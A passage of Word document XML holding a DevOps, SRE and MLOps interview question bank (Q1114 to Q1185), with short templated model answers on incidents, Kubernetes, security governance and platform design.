        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss adapting detail to audience, writing clear updates, surfacing risks early, and closing loops.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Q1114. Explain a project delay and recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover scope, ownership, constraints, execution, risks, measurable outcome, and lessons learned.</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Q1115. Describe your biggest technical achievement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For biggest technical achievement,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Q1116. Explain your biggest failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For biggest failure,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Q1117. Describe a time you learned quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a time you learned quickly,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Q1118. Explain how you handle ambiguity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain clarifying goals, making assumptions explicit, creating options, validating quickly, and iterating.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Q1119. Describe working with cross-functional teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention shared goals, clear interfaces, regular syncs, tradeoff discussions, and documented decisions.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Q1120. Explain how you document systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss architecture diagrams, runbooks, ADRs, READMEs, ownership, examples, and keeping docs close to code.</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Q1121. Describe knowledge-sharing initiatives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention demos, brown bags, docs, pairing, postmortems, and reusable templates.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Q1122. Explain improving operational excellence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover SLOs, automation, incident reviews, runbooks, capacity planning, and continuous improvement.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Q1123. Describe reducing toil.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention repetitive manual work, automation priority, safety checks, and hours saved.</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Q1124. Explain self-healing infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss health checks, autoscaling, restart policies, circuit breakers, automated remediation, and guardrails.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Q1125. Describe chaos engineering implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention hypothesis, controlled blast radius, monitoring, rollback, and lessons learned.</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Q1126. Explain handling a cascading failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss dependency isolation, circuit breakers, rate limits, bulkheads, backpressure, and incident mitigation.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Q1127. Describe a cloud outage response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention impact, detection signal, incident command, mitigation, rollback or failover, customer communication, RCA, and preventive actions.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Q1128. Explain Kubernetes API server failure handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Include checks for events, pod status, logs, probes, resource pressure, networking, RBAC, node health, rollout history, and cluster-level metrics.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Q1129. Describe etcd corruption recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention snapshots, quorum, corruption detection, restore procedure, API server validation, and backup testing.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Q1130. Explain multi-region failover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss health checks, DNS or load-balancer routing, replicated data, consistency, RTO/RPO, and failback.</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Q1131. Describe implementing DR architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss requirements, constraints, tradeoffs, failure modes, scalability, security, and operability.</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Q1132. Explain scaling ML inference systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain the bottleneck, capacity signals, autoscaling limits, load testing, resource tuning, and how you verified improvement.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Q1133. Describe GPU resource optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss requests/limits, node pools, bin packing, quotas, utilization metrics, sharing, and job scheduling.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Q1134. Explain model deployment rollback.</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Q1135. Describe ML monitoring implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention missing signal, added metrics/logs/traces, dashboards, SLO alerts, runbooks, and validation during future incidents.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Q1136. Explain data drift remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention drift metrics, baseline comparison, feature analysis, alerts, retraining, and business validation.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Q1137. Describe a feature store implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss offline/online stores, feature definitions, point-in-time correctness, low-latency serving, and governance.</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Q1138. Explain an enterprise DevOps transformation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention culture, CI/CD, IaC, observability, platform enablement, metrics, and incremental adoption.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Q1139. Describe implementing GitOps at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Include Git as source of truth, PR review, Argo CD or Flux reconciliation, drift detection, secrets, policies, and rollback.</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Q1140. Explain improving developer productivity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss golden paths, templates, faster pipelines, self-service environments, documentation, and feedback loops.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Q1141. Describe platform reliability improvements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention SLOs, capacity, incident response, automated remediation, observability, and shared ownership.</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Q1142. Explain reducing cloud spend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For reducing cloud spend,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cost visibility, rightsizing, autoscaling, waste removal, and protecting reliability while reducing spend.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Q1143. Describe a Kubernetes security audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Include checks for events, pod status, logs, probes, resource pressure, networking, RBAC, node health, rollout history, and cluster-level metrics.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Q1144. Explain your incident command process.</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Q1145. Describe managing technical debt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention inventory, risk ranking, incremental cleanup, ownership, tests, and business impact.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Q1146. Explain how you prepare for on-call.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss handoff, runbooks, dashboards, escalation paths, alert review, incident notes, and post-incident learning.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Q1147. Describe improving system resilience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For improving system resilience,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Q1148. Explain implementing HA architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss requirements, constraints, tradeoffs, failure modes, scalability, security, and operability.</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Q1149. Describe handling a noisy neighbor issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For handling a noisy neighbor issue,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Q1150. Explain storage outage troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention impact, detection signal, incident command, mitigation, rollback or failover, customer communication, RCA, and preventive actions.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Q1151. Describe cluster networking debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention DNS, routes, firewalls, security groups, load balancers, packet captures, latency, packet loss, and dependency checks.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Q1152. Explain debugging service discovery issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain hypothesis-driven investigation using metrics, logs, traces, recent changes, dependencies, and safe mitigations.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Q1153. Describe production traffic migration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Cover discovery, dependency mapping, phased rollout, data sync, validation, rollback plan, and stakeholder communication.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Q1154. Explain zero downtime upgrade strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For zero downtime upgrade strategy,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Q1155. Describe implementing policy as code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For implementing policy as code,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Q1156. Explain managing secrets securely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention secret managers, rotation, least privilege, short-lived credentials, audit logs, and no secrets in Git or images.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Q1157. Describe handling insider security risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss containment, credential rotation, forensic evidence, least privilege, patching, audit logs, and prevention controls.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Q1158. Explain improving audit readiness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention evidence automation, policy as code, access reviews, logging, vulnerability tracking, and change records.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Q1159. Describe cloud governance implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss policies, ownership, cost controls, IAM, tagging, compliance, and automated enforcement.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Q1160. Explain stakeholder management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain alignment on impact, options, tradeoffs, risks, timelines, and transparent communication.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Q1161. Describe balancing speed vs stability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For balancing speed vs stability,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Q1162. Explain handling unrealistic deadlines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention clarifying scope, risk communication, phased delivery, tradeoffs, and protecting critical quality bars.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Q1163. Describe mentoring an underperforming engineer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention setting expectations, pairing, feedback, learning plan, measurable goals, and follow-up.</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Q1164. Explain your learning strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention hands-on projects, official docs, incident reviews, reading RFCs/design docs, and teaching others.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Q1165. Describe your approach to system design interviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain requirements, estimates, APIs, data model, architecture, bottlenecks, reliability, security, and tradeoffs.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Q1166. Explain how you stay updated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention official docs, release notes, engineering blogs, hands-on labs, community talks, and applying learning in projects.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Q1167. Describe your favorite automation project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention toil removed, workflow automated, safeguards added, measurable time saved, and reliability improvement.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Q1168. Explain a complex debugging session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain hypothesis-driven investigation using metrics, logs, traces, recent changes, dependencies, and safe mitigations.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Q1169. Describe handling customer-impacting incidents.</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Q1170. Explain reducing deployment risk.</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Q1171. Describe implementing observability at scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss telemetry pipelines, sampling, cardinality control, retention, SLO dashboards, ownership, and cost governance.</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Q1172. Explain SRE best practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SRE best practices include defining SLIs and SLOs, managing error budgets, automating toil, improving observability, running blameless postmortems, testing reliability, and making releases safer through progressive delivery. A strong answer should connect reliability work to measurable user impact rather than only infrastructure uptime.</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Q1173. Describe scaling Kubernetes clusters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Include checks for events, pod status, logs, probes, resource pressure, networking, RBAC, node health, rollout history, and cluster-level metrics.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Q1174. Explain enterprise platform modernization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enterprise platform modernization means improving legacy delivery, infrastructure, and operations using cloud-native architecture, CI/CD, IaC, observability, security automation, and self-service developer workflows. A strong answer should describe the starting pain points, migration phases, risk controls, stakeholder alignment, measurable reliability or delivery improvements, and how teams adopted the new platform.</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Q1175. Describe migrating from monolith to microservices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should explain how you identified service boundaries, reduced coupling, extracted capabilities incrementally, handled data ownership, built CI/CD, added observability, and managed rollback risk. Mention phased migration patterns such as strangler fig, API gateways, backward-compatible contracts, and business-driven prioritization.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Q1176. Explain designing an ML platform for millions of users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Design the platform around scalable data ingestion, feature pipelines, experiment tracking, distributed training, model registry, low-latency serving, autoscaling, monitoring, drift detection, and safe rollback. For millions of users, emphasize multi-region inference, caching, batching, GPU/TPU capacity planning, privacy controls, SLOs, cost governance, and automated retraining with human approval gates.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Q1177. Describe scaling Kafka infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain the bottleneck, capacity signals, autoscaling limits, load testing, resource tuning, and how you verified improvement.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Q1178. Explain implementing platform security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Discuss containment, credential rotation, forensic evidence, least privilege, patching, audit logs, and prevention controls.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Q1179. Describe optimizing Kubernetes costs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should describe measuring cluster spend, identifying idle or oversized workloads, tuning requests and limits, right-sizing node pools, using autoscaling, spot/preemptible nodes where safe, namespace quotas, and storage cleanup. Include how you protected reliability with SLOs, load tests, dashboards, and gradual rollout of cost changes.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Q1180. Explain enterprise incident management.</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Q1181. Describe improving team culture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention psychological safety, ownership, learning from incidents, documentation, mentoring, and healthy delivery practices.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Q1182. Explain how you prepare for Google interviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: To prepare for Google interviews, focus on fundamentals, structured problem solving, Kubernetes/GCP depth, system design tradeoffs, SRE principles, and behavioral stories with measurable impact. Practice explaining incidents, architecture decisions, reliability improvements, and tradeoffs clearly using real examples.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Q1183. Describe your ideal platform architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An ideal platform architecture is self-service, secure by default, observable, scalable, and governed through automation. It should provide golden paths for CI/CD, IaC, Kubernetes, secrets, logging, metrics, tracing, policy checks, cost visibility, and production readiness so product teams can move quickly without bypassing reliability and security standards.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Q1184. Explain your long-term technical vision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong long-term technical vision should emphasize building reliable platforms that reduce developer friction, improve automation, standardize security, and make systems easier to operate at scale. It should show growth toward architecture ownership, platform strategy, mentoring, and measurable business impact.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Q1185. Design and explain a complete enterprise-grade DevOps + MLOps platform for Google-scale systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A complete enterprise-grade DevOps + MLOps platform should combine cloud foundation, secure infrastructure, CI/CD, GitOps, Kubernetes, observability, SRE practices, and MLOps lifecycle automation. The goal is to let teams ship software and ML models quickly while keeping reliability, security, compliance, and cost under control.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Start with the foundation: organization structure, landing zone, private networking, IAM, service accounts, secrets management, audit logging, policy-as-code, and Terraform modules. Then explain delivery: source control, CI pipelines, artifact registry, SBOM, vulnerability scanning, image signing, deployment gates, GitOps reconciliation, canary rollout, blue-green deployment, and rollback automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>MLOps layer:</w:t>
        <w:br/>
